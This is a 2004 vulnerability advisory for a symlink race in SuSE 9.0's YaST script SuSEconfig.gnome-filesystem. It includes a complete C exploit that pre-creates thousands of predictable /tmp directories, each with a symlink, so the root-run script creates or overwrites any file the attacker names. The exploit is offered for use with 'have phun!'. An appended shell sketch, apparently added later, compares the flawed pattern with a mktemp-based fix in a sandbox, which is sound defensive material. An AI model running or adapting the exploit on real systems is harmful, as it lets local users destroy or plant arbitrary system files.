`
Author: l0om <[email protected]>
Date: 12.01.2004
page: www.excluded.org
SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
There is a symlink problem in the SuSEconfig.gnome-filesystem script. A normal user can create and overwrite every file on the system. This script gets executed after a configuration change by the setup tool YaST. So if you have installed gnome or parts of gnome, check this out.

When this script gets executed by YaST after a configuration change it does the following:

TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
mkdir $TEMP
touch $TEMP/list
[...]
echo >$TEMP/found
[...]

The env variable $RANDOM includes a random number. In my tests this number goes up from 1 to 33000. But even if it goes up to 65535 it is still vulnerable to a symlink attack. This is nearly as bad as the symlink problem which was found on SuSE 8.2. On 8.2 a SuSEconf script created a link with the $$ at the end of the file name.

I have used a little exploit written in C which creates the directories "/tmp/tmp.SuSEconfig.gnome-filesystem.1" up to 33000. In every directory I have created a symlink to a file which I want to create or to overwrite. As the filename I have taken the $TEMP/found and let it point to some file. In my test I have taken /etc/nologin, and hey, it worked!

have phun!
*******************************************************************/
#include <stdio.h>
#include <stdlib.h>     /* exit */
#include <string.h>
#include <unistd.h>     /* read, symlink */
#include <sys/stat.h>   /* mkdir, umask */
#include <sys/types.h>

#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000

int main(int argc, char **argv)
{
    int i;
    char buf[150];

    printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
    printf("\t-------------------------------------------------------------\n");
    printf("\tdiscovered and written by l0om <[email protected]>\n");
    printf("\t WWW.EXCLUDED.ORG\n\n");

    if(argc != 2) {
        printf("usage: %s <destination-file>\n",argv[0]);
        exit(0xff);
    }

    printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
    read(STDIN_FILENO, buf, 1);   /* wait for a key press on stdin */

    umask(0000);
    printf("working\n\n");

    /* pre-create every directory name the script could pick via $RANDOM */
    for(i = START; i < END; i++) {
        snprintf(buf, sizeof(buf),"%s%d",PATH,i);
        if(mkdir(buf,00777) == -1) {
            fprintf(stderr, "cannot create directory [Nr.%d]\n",i);
            exit(0xff);
        }
        if(!(i%1000))printf(".");
        /* $TEMP/found is what the script later writes with "echo >" */
        strcat(buf, "/found");
        if(symlink(argv[1], buf) == -1) {
            fprintf(stderr, "cannot create symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
            exit(0xff);
        }
    }

    printf("\ndone!\n");
    printf("next time the SuSE.gnome-filesystem script gets executed\n");
    printf("we will create or overwrite file %s\n",argv[1]);
    return(0x00);
} /* i cant wait for the new gobbles comic!! */
`
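
The root cause in the script excerpt above is a guessable name built from $RANDOM, a mkdir whose failure is ignored, and a redirect that follows symlinks. The sh sketch below is an added example, not SuSE's script or the advisory author's code: it puts that pattern beside a mktemp -d replacement and checks both against a planted symlink inside a throwaway sandbox directory. The function names and the sandbox layout are constructed for illustration.

```shell
#!/bin/sh
# Added example: the advisory's temp-directory pattern vs. a hardened one.
# Everything runs inside a private sandbox created by mktemp -d.

# Pattern from the advisory, parameterised so it can run in the sandbox:
# the mkdir result is ignored and "echo >" follows a pre-planted symlink.
unsafe_write() {                  # $1 = predictable directory name
    mkdir "$1" 2>/dev/null || true   # failure ignored, as in the script
    echo >"$1/found"
}

# Hardened pattern: mktemp -d atomically creates a NEW directory with an
# unpredictable name and mode 0700, and fails rather than reuse a path.
safe_tmpdir() {                   # $1 = parent dir (/tmp in the real script)
    dir=$(mktemp -d "$1/tmp.SuSEconfig.gnome-filesystem.XXXXXXXXXX") || return 1
    # Defence in depth: only accept a real directory, never a symlink.
    if [ -L "$dir" ] || [ ! -d "$dir" ]; then return 1; fi
    printf '%s\n' "$dir"
}
# In a real script: TEMP=$(safe_tmpdir /tmp) || exit 1
#                   trap 'rm -rf "$TEMP"' EXIT

# Constructed test: plant a directory and a "found" symlink the way the
# advisory describes, run one pattern, report what happened to the target.
run_case() {                      # $1 = unsafe|safe ; prints clobbered|intact
    box=$(mktemp -d) || return 1
    printf 'important\n' >"$box/target"
    planted="$box/tmp.SuSEconfig.gnome-filesystem.1"   # guessed name
    mkdir "$planted" && ln -s "$box/target" "$planted/found"
    if [ "$1" = unsafe ]; then
        unsafe_write "$planted"
    else
        work=$(safe_tmpdir "$box") && echo >"$work/found"
    fi
    if [ "$(cat "$box/target")" = important ]; then
        echo intact
    else
        echo clobbered
    fi
    rm -rf "$box"
}

for mode in unsafe safe; do
    printf '%s: %s\n' "$mode" "$(run_case "$mode")"
done
```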